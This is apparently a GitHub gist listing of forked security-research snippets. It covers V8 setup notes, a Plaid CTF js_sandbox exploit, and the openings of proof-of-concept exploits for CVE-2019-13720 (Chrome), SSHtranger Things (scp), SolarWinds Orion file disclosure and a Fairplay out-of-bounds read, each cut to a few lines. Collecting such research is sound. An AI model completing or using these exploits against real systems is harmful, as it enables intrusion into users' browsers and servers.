- Install Xcode (Avaliable on the Mac App Store)
- Install Xcode Command Line Tools (Preferences > Downloads)
- Install depot_tools
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.gitsudo nano ~/.bash_profile
- Add
export PATH=/path/to/depot_tools:"$PATH"(it's important that depot_tools comes first here)
bb33bb
/ js_sandbox.js
Created
May 7, 2019 03:52
— forked from sroettger/js_sandbox.js
Exploit for the js_sandbox challenge of Plaid CTF 2016
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| with (true) { | |
| // f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16. | |
| // take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening | |
| function f(){ | |
| var x = 8; | |
| var y = 0xffffffff; | |
| var ind = x & y; | |
| x = 16; | |
| y = 0xffffffff; | |
| var ind2 = ind + (x&y); |
bb33bb
/ v8.md
Created
May 7, 2019 07:11
— forked from kevincennis/v8.md
V8 Installation and d8 shell usage
bb33bb
/ html_iframe.js
Created
July 29, 2019 07:01
— forked from Gozala/html_iframe.js
nesting frames
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Security Error: Content at about:srcdoc may not load or link to resource://jid1-pss5nuwzdn1n3a-at-jetpack/signals/data/index.html. | |
| let XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"; | |
| let HTML_NS = "http://www.w3.org/1999/xhtml"; | |
| let toolbar = document.createElementNS(XUL_NS, "toolbar"); | |
| toolbar.setAttribute("collapsed", false); | |
| toolbar.setAttribute("style", "height: 80px;"); | |
| let toolbox = document.getElementById("navigator-toolbox"); |
bb33bb
/ sshtranger_things.py
Created
March 28, 2020 05:43
— forked from mehaase/sshtranger_things.py
SSHtranger Things Exploit POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Title: SSHtranger Things | |
| Author: Mark E. Haase <[email protected]> | |
| Homepage: https://www.hyperiongray.com | |
| Date: 2019-01-17 | |
| CVE: CVE-2019-6111, CVE-2019-6110 | |
| Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt | |
| Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 | |
| We have nicknamed this "SSHtranger Things" because the bug is so old it could be |
bb33bb
/ wasm.md
Last active
August 15, 2020 10:07
— forked from cure53/wasm.md
Calling alert from WASM
This very simple and minimal tutorial documents in a few easy steps how to play with WebAssembly (WASM) and get first results within minutes.
While the code below is mostly useless, it will show, how to call the alert function from within a WASM file and thus demonstrate how to import and export DOM objects.
Of course, this exercise has no real use. It is just meant to show, that getting started with WASM isn't hard. And there is no need for a complex build-chain, tons of tools or a dedicated VMs. Just use a browser, one online tool and that's it.
bb33bb
/ CVE-2019-13720.html
Created
October 24, 2020 06:58
— forked from zu1k/CVE-2019-13720.html
CVE-2019-13720
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function main() { | |
| // 检查 chrome 版本号需要是 76-78 | |
| try { | |
| var browserVersion = navigator.userAgent.split("Chrome/")[1].split(" Safari/")[0]; | |
| majorVersion = parseInt(browserVersion.substr(0, 2)); | |
| if (majorVersion != 77 && majorVersion != 76 && majorVersion != 78) { | |
| return; |
bb33bb
/ v8-dereference.py
Created
November 25, 2020 06:45
— forked from lordidiot/v8-dereference.py
GEF extension to handle tagged and compressed pointers in v8 better (WIP)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| To use the extension, place the file somewhere and add | |
| `source /path/to/extension` | |
| in your ~/.gdbinit file | |
| Use just as you would with `dereference` (https://gef.readthedocs.io/en/master/commands/dereference/) | |
| but s/deref/veref/g | |
| Many missing features because I quickly whipped this up to solve a challenge. | |
| 1) Doesn't check for v8 version (Older versions don't use compressed pointers) |
bb33bb
/ 3_years_of_attacking_javascript_engines.txt
Created
December 27, 2020 12:55
— forked from saelo/3_years_of_attacking_javascript_engines.txt
3 Years of Attacking JavaScript Engines
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=------------------------------=[ saelo ]=------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| The following are some brief notes about the changes that have taken place | |
| since the release of the "Attacking JavaScript Engines" paper [1]. In | |
| general, no big conceptional changes have happened since. Mitigations have | |
| been added to break some of the presented techniques and, as expected, a |
bb33bb
/ CVE-2020-10148.py
Created
December 30, 2020 12:37
— forked from 0xsha/Solarwinds_Orion_LFD.py
CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
bb33bb
/ fairplay_iokit_uc_run_versioned.c
Created
February 3, 2021 06:13
— forked from pwn0rz/fairplay_iokit_uc_run_versioned.c
CVE-2021-1791 Fairplay OOB Read POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <IOKit/IOKitLib.h> | |
| #include <mach/mach.h> | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <ctype.h> | |
| void hexdump(void *ptr, int buflen) { | |
| unsigned char *buf = (unsigned char*)ptr; | |
| int i, j; |